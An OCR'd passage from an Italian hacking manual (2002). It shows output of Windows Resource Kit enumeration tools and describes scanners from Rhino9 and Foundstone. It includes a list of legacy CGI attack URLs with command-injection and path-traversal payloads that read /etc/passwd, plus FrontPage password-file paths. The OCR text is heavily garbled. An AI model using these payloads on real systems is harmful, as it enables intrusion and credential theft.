[INETINFO_LPC] [82ad4280-036b-llcf-972c-00aa006887b0] : NOT__P INGED 
[0LE6] [82ad4280-036b-llcf-972c-00aa006887b0] : NOT_P INGED 
[NTDS_LPC] [12345678-1234-abcd-ef00-01234567cffb] : NOT_P INGED 
[LRPC00000150 . 00000001] [12345678-1234-abcd-ef00-01234567cffb] : NOT_P INGED 
[NTDS_LPC] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory NSP Interfac 
e :NOT_P INGED 

[LRPC00000150 .00000001] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory 




Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



e :NOT_PINGED 

[LRPC00000150. 00000001] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory 
XDS Interface :NOT__PINGED 
[NTDS_LPC] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory DRS Interfac 
e :NOT_PINGED 

[LRPC00000150. 00000001] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory 
DRS Interface :NOT_PINGED 

ncacn np (Connection— oriented named pipes) 

\ \WEBSITEK-HOST-l [\PIPE\SMTPSVC] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] :NOT_ 
PINGED 

\ \WEBSITEK-H0ST-1 [\PIPE\INETINFO] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] :NOT 
_PINGED 

\ \WEBSITEK-H0ST-1 [\pipe\WMIEP_620] [8cfb5d70-31a4-llcf-a7d8-00805f48al35] :N0 
T__PINGED 

\ \WEBSITEK-H0ST-1 [\PIPE\INETINFO] [82ad4280-036b-llcf-972c-00aa006887b0] :NOT 
_PINGED 

\ \WEBSITEK-HOST-l [\pipe\WMIEP_620] [82ad4280-036b-llcf-972c-00aa006887b0] :N0 
T_PINGED 

\ \WEBSITEK-HOST-l [\pipe\000004a4 . 000] [a00c021c-2be2-lld2-b678-0000f87a8f8e] P 
ERFMON SERVICE :NOT_PINGED 

\ \WEBSITEK-H0ST-1 [\pipe\000004a4 . 000] [d049bl86-814f-lldl-9a3c-00c04fc9b232] N 
tFrs API :NOT_PINGED 

\ \WEBSITEK-H0ST-1 [\pipe\000004a4 . 000] [f5cc59b4-4264-101a-8c59-08002b2f8426] N 
tFrs Service : NOT_PINGED 

\ \WEBSITEK-H0ST-1 [\PIPE\lsass] [12345678-1234-abcd-ef00-01234567cffb] :NOT_PI 
NGED 

\\WEBSITEK-H0ST-1 [\PIPE\lsass] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Di 
rectory NSP Interface : NOT_PINGED 

\\WEBSITEK-HOST-l [\PIPE\lsass] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Di 
rectory XDS Interface : NOT_PINGED 

\\WEBSITEK-HOST-l [\PIPE\lsass] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Di 
rectory DRS Interface : NOT_PINGED 

\\WEBSITEK-HOST-l [\PIPE\lsass] [16e0cf3a-a604-lld0-96bl-00a0c91ece30] NTDS Res 
tore Interface : NOT_PINGED 

\\WEBSITEK-HOST-l[\PIPE\lsass] [ecec0d70-a603-lld0-96bl-00a0c91ece30] NTDS Bac 
kup Interface :NOT_PINGED 

ncadg_ip_udp (Datagram (connectionless) UDP/IP) 

10 .10 .10 .111254] [6el7aaa0-la47-lldl-98bd-0000f875292e] Microsoft JoinVersion 
Interface :NOT_PINGED 

212.210.165.13111254] [6el7aaa0-la47-lldl-98bd-0000f875292e] Microsoft JoinVer 
sion Interface :NOT_PINGED 

192.168.255.17 [1254] [ffe561b8-bfl5-llcf-8c5e-08002bb49649] Microsoft Extroclu 
ster Interface :NOT_PINGED 

10 .10 .10 .111254] [ffe561b8-bfl5-llcf-8c5e-08002bb49649] Microsoft Extrocluster 
Interface :NOT_PINGED 

212. 210. 165. 131 [1254] [ffe561b8-bfl5-llcf-8c5e-08002bb49649] Microsoft Extrocl 
uster Interface :NOT_PINGED 

192. 168. 255. 17 [1254] [b97db8b2-4c63-llcf-bff6-08002be23f2f] Microsoft Cluster 
Server API :NOT_PINGED 

10. 10. 10.1 [1254] [b97db8b2-4c63-llcf-bff6-08002be23f2f] Microsoft Cluster Serv 
er API : NOT_PINGED 

212. 210. 165. 131 [1254] [b97db8b2-4c63-llcf-bff6-08002be23f2f] Microsoft Cluster 
Server API : NOT_PINGED 
192.168. 255 . 17 [1028] [12345678-1234-abcd-ef00-01234567cffb] :NOT_PINGED 
10.10. 10.1 [1028] [12345678-1234-abcd-ef00-01234567cffb] :NOT_PINGED 
212.210.165.131 [1028] [12345678-1234-abcd-ef00-01234567cffb] :NOT_PINGED 
192. 168. 255. 17 [1028] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory NS 

P Interface : NOT_PINGED 

10. 10. 10.1 [1028] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory NSP In 

ter face :NOT_PINGED 

212. 210. 165. 131 [1028] [f5cc5al8-4264-101a-8c59-08002b2f8426] MS NT Directory N 
SP Interface : NOT_PINGED 

192 .168 .255 .17 [1028] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory XD 
S Interface : NOT_PINGED 

10 .10 .10 .1 [1028] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory XDS In 
ter face : NOT_PINGED 

212. 210. 165. 131 [1028] [f5cc5a7c-4264-101a-8c59-08002b2f8426] MS NT Directory X 
DS Interface : NOT_PINGED 

192. 168. 255. 17 [1028] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory DR 
S Interface : NOT_PINGED 

10. 10. 10.1 [1028] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory DRS In 
ter face :NOT_PINGED 

212. 210. 165. 131 [1028] [e3514235-4b06-lldl-ab04-00c04fc2dcd2] MS NT Directory D 
RS Interface : NOT_PINGED 
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lon Interface :NOT_PINGED 

rpcdump compieteci sucessfully after 2 seconds 
D:\Programmi\Resource Pro Kit> 

Srvinfo.exe 

Ricava le informazioni su di un server remoto. 
Sintassi: 



srvinfo [-d] [-ns] [-s] [-v] [^computer _name] [-?] 

Where: 

-d 

shows service drivers and services . 

-ns 

does not show any service information. 

-s 

shows shares. 

-v 

gets version information for Exchange Server, Internet Information Services, 
and SQL Server. 
^computer _name 

specifies the name of a remote server. If omitted, information on the locai 
computer is displayed. 

.9 

displays a syntax screen at the command prompt 



Srvinfo Example 



c: \srvinfo 

Server Name: NTRKALPHA 

Security: Users 

NT Type: WinNT Server 

Version: 4.0, Build = 1344 

Domain: NTWKSTA 

PDC: \\ PHOENIX 

IP Address : 172.17 .88.28 

CPU[0] : DEC-321064 

Drive: [Filesys] [Size] [Used] [Free] 
C$ NTFS 1004 907 97 

D$ FAT 6 15 

Services : 

[Running] Alerter 
[Running] Computer Browser 
[Stopped] ClipBook Server 
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[Running] 


DHCP Client 


[Running] 


EventLog 


[Running] 


Server 


[Running] 


Workstation 


[Running] 


License Logging Service 


[Running] 


TCP/IP NetBIOS Helper 


[Running] 


Messenger 


[Stopped] 


Network DDE 


[Stopped] 


Network DDE DSDM 


[Running] 


Net Logon 


[Running] 


NT LM Security Support Provider 


[Running] 


Plug and Play 


[Stopped] 


Directory Replicator 


[Stopped] 


Remote Procedure Cali (RPC) Locator 


[Running] 


Remote Procedure Cali (RPC) Service 


[Stopped] 


Schedule 


[Running] 


Spooler 


[Stopped] 


Telephony Service 


[Stopped] 


UPS 


Ne t work Ca rd 


[0] : Intel EtherExpress PRO Ethernet Adapter 


Protocol [0] : 


[NETO] WINS Client (TCP/IP) 4 . 0 


System Up Time: 186 Hr 36 Min 9 Sec 



Dhcploc.exe: DHCP Server Locator Utility 



dhcploc [-p] [-a:" alertname_list"] [-v.alertinterval] computer _ip_address 
[valid_dhcp_server_list] 

Where: 
-P: 

specifies not to display detected packets from any of the authorized DHCP 

servers specified in valid_dhcp_server_list. 
-a: "alertname_list" 

specifies to send alert messages to the names in alertname_list if any 

unauthorized DHCP servers are found. 
-v.alertinterval 

specifies the alert frequency in seconds. 
computer _ip_address 

specifies the IP address of the computer from which you are running DHCP 

Server Locator Utility. If the computer has multiple adapters, you must specify 

the IP address of the adapter that is connected to the subnet you want to test. 
valid_dhcp_server_list 

specifies the IP addresses of any number of authorized DHCP servers. The 

tool will not send alerts when it detects packets from the servers in this list. 

However it will display those packets unless you specify the -p option. 

DHCP Server Locator Utility Output 

The output of DHCP Server Locator Utility is formatted as follows: 
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time (IP) ipaddress OfferedPacketType (S) ServerIPAddress [***] 
where indicates a packet from an unauthorized server. 
Sample output: 

17:34:58 ( IP) 0.0.0.0 NACK (S) 11 .11 .31 .84 *** 
17:36:38 (IP) 11 . 101 . 190 . 130 OFFER (S) 11 .101 .12 .226 *** 
17:36:38 (IP) 11 . 101 . 196 . 231 ACK (S) 11 .101 .13 . 53 
17:36:53 (IP) 11 . 101 . 196 . 231 ACK (S) 11 .101 .13 .53 
17:37:05 (IP) 11 . 101 . 196 . 234 OFFER (S) 11 .101 .13 . 53 
17:37:05 (IP) 11 . 101 . 193 . 232 OFFER (S) 11 .101 .12 .198 
17:37:06 (IP) 11 . 101 . 190 . 132 OFFER (S) 11 .101 .12 .226 *** 
Getsid.exe 

getsid ferver 1 account \>server2 account 
Where: 

\Wrveri and \Wrver2 

are the names of the servers on which the accounts are found, and account is 
the account SIP) . 

Nlmon.exe: NLMonitor 

Enumera i domain controller. 

nlmon [/DOMAINLIST:DomainList] [/MONTRUST:YeslNo] [/UPDATE:Mins] 
[/DEBUG : Hex Value] 

Where: 

/DOMAJNLÌSTiDomainList 

Type a comma separated domain list to monitor. The default is 

Primary/ Account Domain. 
/MONTRUST:YeslNo 

Specify if trusted domains are monitored. Default is No. 
/UPDATE:Mms 

Specify the refresh time. 
/DEBUG:HexValue 

Debug out level. 
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NLMonitor Examples 

It may take a few minutes before NLMonitor displays output. 




nlmon /DOMAINLIST:GLOBAL_SALES,MYDOMAIN 



TIME : [10/19 11:58:59] 
TIME : [10/19 11:58:59] 

*************************************************************** 

************* 

TIME : [10/19 12:01:44] 

DomainName : MYDOMAIN 

ServerName DCState DCType DCStatus ReplStatus 

PDCLinkStatus 

WOORTC1 DCOnline NTBDC 0 InSync 0 

Trusted DC List : 

TDomainName TDCName TSCStatus 

USREGION \\nadc-01 . northamerica .msn . corti 0 

GLOBAL_SALES \ \mktdc-01 . sales . msn . coiti 0 
PRODUCTION \\adc-01 0 



*************************************************************** 
************* 



The following table provides more information for reading NIMon output: 



Output item 


Description 


Time 


Time monitoring occured. 


DomainName 


Domain being monitored. In the example, this is MYDOMAIN 


ServerName 


Name of the server. In the example, this is OORTC1 


DCState 


WDCOnline 


DCType 


NTBDC 




Use 

net helprtisg msgNumber 

for details of the specific errar message. 




InSync 


PDCLinkStatus 


Use 

net helpmsg msgNumber 

for details of the specific errar message. 






Trusted DC List: 


TDomainName Trusted domain name. 


TDCName 


Trusted domaincontroller name. 
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TSCStatus 



Use 

net helpmsg msgNumber 

for details of the specific error message. 
Error 



Code 



0 

1311 
1355 



Description 

The operation compieteci successfully. 

There are currently no logon servers available to service 
the logon request. 

The specified domain either does not exist or could not 
be contacted. 



Perms.exe: File Access Permissions per User 



perms [domain\lcomputer\]username path [/i] [/s] [/?] 
Where: 

[domain\lcomputer\]username 

Name of user whose permissions are to be checked, in the format 
domairiSusername or computer\username or locai username. 

path 

Name of a file or folder in any legai format, including UNC (\\). You can use 
the * or ? wildcards. 

li 

Assumes the specified user is logged on interactively to computer where the 
file/directory resides. With this switch, PERMS assumes the user is a member 
of the INTERACTIVE group. Without this switch, PERMS assumes the user 
is a member of the NETWORK group. Indicates that Perms is to assume that 
account is interactively logged on to the computer where path resides. Without 
this parameter, Perms assumes the user is logged on over the network and is a 
member of the Network security group. 

/s 

Checks permissions on files in subdirectories. 

/? 

displays help for the Perms command. 



Perms Examples 



• Display permissions for files in user "imauser" on computer 

'TMACOMPUTER" in subdirectories of the C: drive, and send that output to a 
text file. 

perms IMACOMPUTER\imauserg c: /s xiriveCperms.txt 
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Rasusers.exe: Remote Access Users 



rasusers { DomainName I ServerName } [/?] 

Where: 

DomainName 

is the name of a domain on which to list Routing and Remote Access 
accounts. 
ServerName 

is the name of a server on which to list Routing and Remote Access accounts. 

Il 

displays a brief usage message. 
Files Required 

• Rasusers.exe 

• Rassapi.dll 



RasUsers Examples 



• View ali authorized Routing and Remote Access users in a specific domain. 

rasusers MYDOMAIN 

userl 
user2 
user3 
testpod 

• View ali authorized Routing and Remote Access users on a Routing and 
Remote Access server. 



Note 

To find the names of Routing and Remote Access server computers, use 
raslist.exe , a Resource Kit tool. It will detect Routing and Remote Access 
servers as they announce themselves over a network. 

rasusers WMYCOMPUTER 
ce 

user4 
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whoami [/option] [/option] ... 
Where: 

/option is one of the following: 
/ali 

displays ali information in the current access token. 
/noverbose 

displays minimal information. Must be used with the /USER, /GROUPS, 
/PRIV, or /LOGONID option. 

/user 

displays current user, 
/groups 
/priv 

displays groups. 
displays privileges. 
/logonid 

displays logon ID. 

/sid 

displays security identifiers (SIDs) . Must be used with the /USER, /GROUPS, 
/PRrV, or /LOGONID option. 

/help 

displays help. 

WhoAmI Output Examples 

For information on WhoAmI syntax, at the command prompt type: 
whoami /help 

[c: \] WHOAMI 
DCHRISROB \ chri srob 
[c: \] WHOAMI /ALL 

[User] = "DCHRISROB\chrisrob" S-l-5-21-109918147 6-344607 857- 
928725530-1002 

[Group 1] = "DCHRISROB \Domain Admins" S-l-5-21-109918147 6-344607857- 
928725530-512 

[Group 2] = "Everyone" S -1-1-0 

[Group 3] = "DCHRISROB \RK Source" S-l-5-21-109918147 6-344607857- 
928725530-1010 

[Group 4] = "BUILTIN\Administrators" S-l-5-32-544 
[Group 5] = "BUILTIN\Users" S-l-5-32-545 
[Group 6] = "BUILTIN\Guests" S-l-5-32-546 

[Group 7] = "DCHRISROB \Domaln Users" S-l-5-21-109918147 6-344607857- 
928725530-513 

[Group 8] = "DCHRISROB \Domaln Guests" S-l-5-21-1099181476-344607857- 
928725530-514 

[Group 9] = "LOCAL" S-l-2-0 

[Group 10] = "NT AUTHORITY\ INTERACTIVE" S -1-5-4 

[Group 11] = "NT AUTHORITY\Authent±cated Users" S-l-5-11 

[Login ID] = S-l-5-5-0-6552 
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(O) SeTcbPrivilege = Act as part of the operatlng system 
(X) SeChangeNotifyPrlvilege = Bypass traverse checking 
(0) SeSecurityPrivllege = Manage auditing and security log 
(0) SeBackupPrivilege = Back up files and directories 
(0) SeRestorePrivilege = Restore files and directories 
(0) SeSystemtimePrivilege = Change the system time 
(0) SeShutdownPrivilege = Shut down the system 

(0) SeRemoteShutdownPrivilege = Force shutdown from a remote system 
(0) SeTakeOwnershipPrivilege = Take ownership of files or other 
objects 

(0) SeDebugPrivilege = Debug programs 

(0) SeSystemEnvironmentPrivilege = Modify firmware environment values 

(0) SeSystemProfilePrivilege = Profile system performance 

(0) SeProfileSingleProcessPrivilege = Profile single process 

(0) SelncreaseBasePriorityPrivilege = Increase scheduling p riority 

(0) SeLoadDriverPrivilege = Load and unload device drivers 

(0) SeCreatePagefilePrivilege = Create a pagefile 

(0) SelncreaseQuotaPrivilege = Increase quotas 

[c:\JWHOAMI /USER /SID 

[User] = "DCHRISROB\chrisrob" S-l-5-21-1099181476-344607857- 

928725530-1002 

[c:\JWHOAMI / GROUP S 



[Group 


1] = 


"DCHRISROB \Domain Admins " 


[Group 


2] = 


"Everyone " 


[Group 


3] = 


"DCHRISROB \RK Source" 


[Group 


4] = 


"BUILTIN\Administrators " 


[Group 


5] = 


"BUILTIN\Users " 


[Group 


6] = 


"BUILTIN \ Guest S " 


[Group 


7] = 


"DCHRISROB \Domain Users " 


[Group 


8] = 


"DCHRISROB \ Domain Guests" 


[Group 


9] = 


"LOCAL " 


[Group 


10] = 


"NT AUTHORITY\ INTERACTIVE" 


[Group 


11] = 


"NT AUTHORITY\Authenticated 



[c:\]WHOAMI /GROUPS /NOVERBOSE 
DCHRISROB\Domain Admins 
Everyone 

DCHRISROB \RK Source 

BUILTIN\Administrators 

BUILTIN\Users 

BUILTIN\Guests 

DCHRISROB \Domain Users 

DCHRISROB\Domain Guests 

LOCAL 

NT AUTHORITY\ INTERACTIVE 

NT AUTHORITY\Authenticated Users 

[c: \]WHOAMI /USER /GROUPS /SID 

[User] = " DCHRISROB \chrisrob" S-l-5-21-109918147 6-344607 857- 
928725530-1002 

[Group 1] = "DCHRISROB \Domain Admins" S-l-5-21-109918147 6-344607 857- 
928725530-512 

[Group 2] = "Everyone" S -1-1-0 

[Group 3] = "DCHRISROB \RK Source" S-l-5-21-109918147 6-344607 857- 
928725530-1010 

[Group 4] = "BUILTIN\Administrators" S-l-5-32-544 
[Group 5] = "BUILTIN\Users" S-l-5-32-545 
[Group 6] = "BUILTIN\Guests" S-l-5-32-546 

[Group 7] = "DCHRISROB \Domain Users" S-l-5-21-1099181476-344607857- 
928725530-513 

[Group 8] = "DCHRISROB \Domain Guests" S-l-5-21-1099181476-344607857- 
928725530-514 

[Group 9] = "LOCAL" S-l-2-0 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



[Group 10] = "NT AUTHORITY \ INTERACTIVE " S -1-5-4 

[Group 11] = "NT AUTHORITY \Authenticated Users" S-l-5-11 

[c: \]WHOAMI /PRIV /NOVERBOSE 

Se TcbPri vllege 

SeChangeNoti fyPri vllege 

SeSecuri tyPri vllege 

SeBa ckupPrl vilege 

SeRest orePri vilege 

SeSystemt imePri vilege 

SeShut downPri vilege 

SeRemot eShutdownPri vilege 

Se TakeOwnershipPri vilege 

SeDebugPri vilege 

SeSystemEnvironmentPrivilege 

SeSystemProfi 1 ePri vilege 

SeProfi leSingl eProcessPri vilege 

SelncreaseBasePri ori tyPri vilege 

SeLoadDri verPri vilege 

SeCreatePagefi 1 ePri vilege 

SelncreaseQuotaPrivilege 

[c: \]WHOAMI /USER / GROUP S /PRIV 



[User] 


= "DCHRISROB \ chri srob " 


[Group 


1] = 


"DCHRISROB \Domain Admins " 


[Group 


2] = 


"Everyone " 


[Group 


3] = 


"DCHRISROB \RK Source" 


[Group 


4] = 


"BUILTIN\Administrators " 


[Group 


5] = 


"BUILTIN\Users " 


[Group 


6] = 


"BUILTIN \ Guest S " 


[Group 


7] = 


"DCHRISROB \Domain Users " 


[Group 


8] = 


"DCHRISROB \Domain Guests" 


[Group 


9] = 


"LOCAL " 


[Group 


10] = 


"NT AUTHORITY \ INTERACTIVE" 


[Group 


11] = 


"NT AUTHORITY \Authenticated 



(0) SeTcbPrivilege = Act as part of the operating system 

(X) SeChangeNoti fyPrivilege = Bypass traverse checking 

(0) SeSecurityPrivilege = Manage auditing and security log 

(0) SeBackupPrivilege = Back up files and directories 

(0) SeRestorePrivilege = Restore files and directories 

(0) SeSystemtimePrivilege = Change the system time 

(0) SeShutdownPrivilege = Shut down the system 

(0) SeRemoteShutdownPrivilege = Force shutdown from a remote system 

(0) SeTakeOwnershipPrivilege = Take ownership of files or other 
objects 

(0) SeDebugPrivilege = Debug programs 

(0) SeSystemEnvironmentPrivilege = Modify firmware environment values 

(0) SeSystemProfilePrivilege = Profile system performance 

(0) SeProfileSingleProcessPrivilege = Profile single process 

(0) SelncreaseBasePriorityPrivilege = Increase scheduling priority 

(0) SeLoadDriverPrivilege = Load and unload device drivers 

(0) SeCreatePagefilePrivilege = Create a pagefile 

(0) SelncreaseQuotaPrivilege = Increase quotas 



Le Utilities di Rhino9 

Uno dei nomi più noti nell'ambito del mondo hacker è sicuramente RHIN09 il quale ha 
rilasciato tra il freeware un serie di Utilities in grado di eseguire delle analisi specifiche 
nell'ambito dei sistemi. 
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Quasi tutti questi programmi sono stati rilasciati con tanto di sorgenti, cosa particolarmente 

utile nel caso in cui si voglia analizzare i principi su cui si basa il loro funzionamento. 

Rhino9 è uno dei nomi più conosciuti nell'ambito dell'hacking e del cracking essendo lui un 

esperto di questi settori in particolar modo per quello che riguarda i metodi di codifica. 

Alcuni programmi oltre a non possedere i sorgenti vengono anche distribuiti in forma limitata 

essendo le versioni complete a disposizione dopo averle registrate. 

Nel capitolo legato all'ottenimento delle informazioni abbiamo detto che alcune Utilities erano 
particolarmente utili per riuscire a costruire una mappatura completa di quelli che sono i 
sistemi presi di mira. 

Sicuramente questi programmi rientrano tra quelli indispensabili i quali non possono 
assolutamente mancare all'interno delle librerie software dell'hacker. 
I programmi possono essere prelevati dal sito FTP di RHIN09. 

LEGI ON 

Legion è rilasciata da RHIN09 senza sorgenti al contrario di altre che invece posseggono i 
listati in Visual C++ permettendo a che è interessato del funzionamento di vedere i principi su 
cui questi si basano. 

La prima permette di analizzare un sistema a livello di NetBios individuando le risorse 
condivise e mostrandole grazie all'interfaccia grafica. 

L'utility rientra tra quelle che eseguono funzioni d'analisi a livello di NetBios e da queste si 

discosta solo per il fatto che questa permette lo scannino di un range di IP. 

La versione 2.1 include anche l'opzione per il trattamento mediante un algoritmo "brute force". 




L'utility permette di sostituire le procedure di rilevamento delle risorse condivise tramite utility 
NET o mediante quelle serie di programmi presenti sulla rete che hanno come scopo 
l'enumerazione. 



CHRONI CLE 
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Sicuramente tutte queste Utilities sono fatte bene ma ma quella che per me è particolarmente 
utile è quella chiamata CHRONICLE la quale cerca, usando un range di IP, le versioni di 
SERVICE PACK e HOTFIX che sono installate su un determinato sistema. 
D'altra parte questa è sicuramente una delle attività principali per hacker il quale in base a 
queste informazioni può cercare gli exploits idonei ai softwares installati sui sistemi vittima. 




■FiKBf- 



P Rcmmmcncfcd V DNS T RAS 

r 5p«H»zcd r US r W1N5 



LoadHpsts | Saw Hosts | iUsarHasli | 

J 



r EsocKarqe 

r pptp 



Ei c: u:e S Dan 



Rqjcr! 



□ MI 



Copjj 



Hdp 



CHRONO.t. 



SP * HOTFiX &CANMEB 



Il programma all'interno testa i flags marcati sui quali si intende eseguire i test permettendo di 
limitarne il numero. 

In questo caso il programma viene fornito con tanto di sorgenti. 
GRI NDER 

Sicuramente l'utility migliore è GRINDER la quale è in grado di eseguire uno scanning 
testando se il sistema è soggetto ai vari BUGS definiti dalle stringhe URL passate come 
argomenti. 

Tra i parametri che devono essere settate in GRINDER c'è il range degli IP che si intendono 
testare. 

Un altro parametro è appunto il comando che deve essere testato. 

Nei vari capitoli in cui si parla dei BUGS legati ai WEB come ad esempio I' UNICODE BUG, il 
MSADC BUG e altri vengono specificate le stringhe che generalmente vengono usate per 
eseguire il test relativo alla presenza del bug stesso. 

Il test manuale veniva fatto aprendo una connessione mediante TELNET con un determinato 
IP sulla porta http ovvero la 80 e digitando la stringa di test. 
GRINDER esegue le seguenti funzioni : 

• Prende uno degli IP specificati. 

• Esegue un PING per verificare se su quell'indirizzo è presente un host attivo. 

• Apre la comunicazione aprendo un socket 



Il codice relativo all'apertura del SOCKET è quello standard eseguito tramite le funzioni di 
WINSOCKET 2. 
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if (sockets [1] . s ! =SOCKET_ERROR) 

{ 

ioctlsocket (sockets [1 ] . s, FIONBIO, &on) ; 
sockets [1] . state=l; 

ì 

else 
{ 

myScanner->SetError (2) ; 
goto done; 

} 

if (sockets [i] . state==l) 
{ 

bwrote = connect (sockets [i] . s, (struct sockaddr*) &dest, 
sizeof (dest) ) ; 



Successivamente GRINDER crea la stringa da inviare e sempre tramite le funzioni socket la 
invia sulla connessione aperta. 



char message [1024] ; 

sprint f (message, "GET %s HTTP/1 . 0\n\n " , sockets [i ] . uri) ; 
send (sockets [i] . s, message, strlen (message) , 0) ; 
sockets [i ] . state=4; 



URLe 



r, 



h 1 ri damimi 

r'caitirt'phriQalBE-KSDa/hri/caSaO/atic/ijas:; 
^cahbin'himbcf pi? i'elc^)B5*n l d 



ùdd URL | \J .Meìwwmì 



Dee:-: J=i. 



J 



Load URLs... 



Cica URLs 



Sare URLs. 



-T-aigBts 

Frnn JaiT 
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P PirgHnih 
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Pirg Pjziei 0" 
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GrirdEf Threads [sT 



Phg Trn=D_il J9Q0Q 171S 

Grirdef Timeout [30000 nvt ! 



Sem 




GRINDER possiede dentro alla directory dei sorgenti anche un file .WRI con dentro degli 
esempi di stringhe URL. 

/ 

/index . html 
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/cgi-bin 
/cgi-test 

/ 'cgi-bin/ 'rwwwshell .pi 

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 

/cgi-bin/Count . cgi 

/cgi-bin/ 'test . cgi 

/cgi -bin/nph-test -cgi 

/cgi -bin/nph -pubi i sh 

/cgi-bin/php . cgi ?/etc/passwd 

/cgi -bin/handler 

/cgi -bin/webgais 

/cgi -bin/websendmail 

/cgi-bin/webdist . cgi 

/cgi -bin/faxsurvey 

/cgi-bin/htmlscript? . ./. ./. ./. . /etc/passwd 

/cgi-bin/pf display . cgi 

/cgi-bin/perl . exe 

/cgi -bin/wwwboard . pi 

/cgi -bin/www-sql 

/cgi -bin/view-source 

/ cgi-bin/ campas ?%Oa/bin/cat %Oa/etc/passwd 

/cgi -bin/aglimpse 

/cgi -bin/gl impse 

/cgi -bin/man . sh 

/ cgi-bin/ AT-admin . cgi 

/cgi-bin/ filemail .pi 

/cgi-bin/maillist .pi 

/cgi-bin/ jj 

/cgi -bin/info2www 

/cgi-bin/ files .pi 

/cgi -bin/ finger 

/cgi-bin/bnb foriti, cgi 

/ cgi —bin/survey . cgi 

/cgi -bin/ AnyForm2 

/cgi -bin/t ext counter .pi 

/ cgi-bin/ classi fieds . cgi 

/cgi-bin/environ . cgi 

/cgi -bin/wrap 

/cgi -bin/ cgi wrap 

/cgi-bin/ 'guestbook . cgi 

/ cgi-bin/ edit .pi 

/cgi-bin/perlshop . cgi 

/_vti_inf . html 

/_ vt i_pvt /servi ce . pwd 

/_vti_pvt/users .pwd 

/_vti_pvt/authors .pwd 

/_vti_pvt/administrators .pwd 

/_vti_pvt/shtml . dll 

/_vti_pvt/shtml . exe 

/cgi -dos/args . bat 

/cgi-win/uploader . exe 

/ cgi-bin/ rguest . exe 

/cgi-bin/wguest . exe/scripts/issadmin/bdir . htr 
/scripts/CGImail . exe 
/scripts/tools/newdsn . exe 
/scripts/fpcount . exe 
/cfdocs/expelval/ 'open file . cfm 
/cfdocs/expelval/exprcalc.cfm 
/cfdocs/expelval/displayopenedfile . cfm 
/cfdocs/expelval/sendmail . cfm 
/iissamples/exair/howitworks/codebrws . asp 
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/lissamples/sdk/asp/docs/codebrws . asp 
/msads/Samples/SELECTOR/showcode . asp 
/search97 .vts 
/ carbo.dll 

/cgi-bin/whois_raw . cgi ?fqdn=%0Acat%20/etc/passwd 
/scripts/no-such-file.pl 
/samples/search/queryhit . htm 



LARVA 

Larva è una piccola utility che fornisce informazioni a livello di NETBIOS. 





Starting IP 
Ending IP |~~ 

Command |ì 

Parameters 
The cornmands will be spawned as: 




Scan 



Il programma è fornito con soltanto un installer ma senza sorgenti. 



Le Utilities by FOUNDSTONE 

Fino ad ora abbiamo visto un certo numero di Utilities che potrebbero essere utilizzate in 
quella fase d enumerazione delle risorse dei sistemi. 

Ultimamente sono stati messi in commercio un seria di volumi legati alle metodologie 
dell'hacking scritti da quelli che sono i soci fondatori della Foundstone, una società che lavora 
nel campo della security e che tra le tante altre cose dispone di un sito sul quale sono 
disponibili una serie di Utilities orientate alle analisi e alle gestioni dei problemi relativi alla 
sicurezza. 
Il sito è a: 



La Utilities disponibili per il download sono : 



13/03/2002 


16. 


56 


24 


252 


attacker . zip 


13/03/2002 


16. 


56 


17 


255 


bintext . zip 


13/03/2002 


16. 


56 


22 


664 


Blast20 . zip 


13/03/2002 


16. 


56 


5 


682 


boping. zip 


13/03/2002 


16. 


56 


21 


141 


carbonite . tar . gz 


13/03/2002 


16. 


56 


9 


655 


ddosping . zip 


13/03/2002 


16. 


56 


12 


307 


filewatch . zip 


13/03/2002 


16. 


56 


337 


491 


ForensicToolkit20 . zip 


13/03/2002 


16. 


56 


10 


123 


fpipe2_l . zip 


13/03/2002 


16. 


56 


66 


299 


FPortNG. zip 


13/03/2002 


16. 


56 


14 


567 


fscanll2 . zip 


13/03/2002 


16. 


56 


8 


930 


hunt . zip 


13/03/2002 


16. 


56 


107 


239 


ntlast30 . zip 


13/03/2002 


16. 


56 


42 


9 72 


NTOMax20 . zip 


13/03/2002 


16. 


56 


11 


448 


patchit . zip 
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13/03/2002 


16. 


56 


18 


882 


snscan . zip 


13/03/2002 


16. 


56 


251 


532 


superscan . exe 


13/03/2002 


16. 


56 


19 


246 


trout . zip 


13/03/2002 


16. 


56 


5 


456 


udp flood, zip 


13/03/2002 


16. 


56 


2.525 


288 


visionsetup . exe 



Due di questi tools li abbiamo già visti e precisamente SUPERSCAN e l'insieme di Utilities 
chiamate FORENSICTOOLKIT. 

Ciascun file potrebbe essere prelevato indipendentemente anche se di fatto è possibile 

prelevarli tutti allo stesso tempo mediante un unico file che li contiene tutti. 

I programmi sono gratuiti anche se di fatto sono ben fatti e curati esteticamente. 



Il primo si chiama ATTACKER. 




Attacker è un TCP port listening program. 
Il software permette il settaggio delle porte. 
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Il successivo programma è BINTEXT che costituisce un file text scanner. 




Un altra utility si chiama BLAST ed è costituito da un piccolo programma di test allo stress. 
Il programma possiede questi parametri : 

c: \ Temp>blast 

Seek and Destroy - Information Warfare 

Blast v2.0 - Copyright (c) 1999, Foundstone, Inc. 

Stress test tool for server input buffers 

Programming by JD Glaser - Ali Rights Reserved 

Usage - blast xxx . xxx . xxx . xxx port size /t x /d x /ret x /nr 

xxx . xxx . xxx . xxx = target ip address 

port = target tcp port for sending data 

size =size in bytes of data buffer to test 

/t timeout = milsecs before socket response - default zero 

/d delay = milsecs before sending each buffer - de fault 100 mi 

/ret returns = number of LF/CR's to cap buffer with 

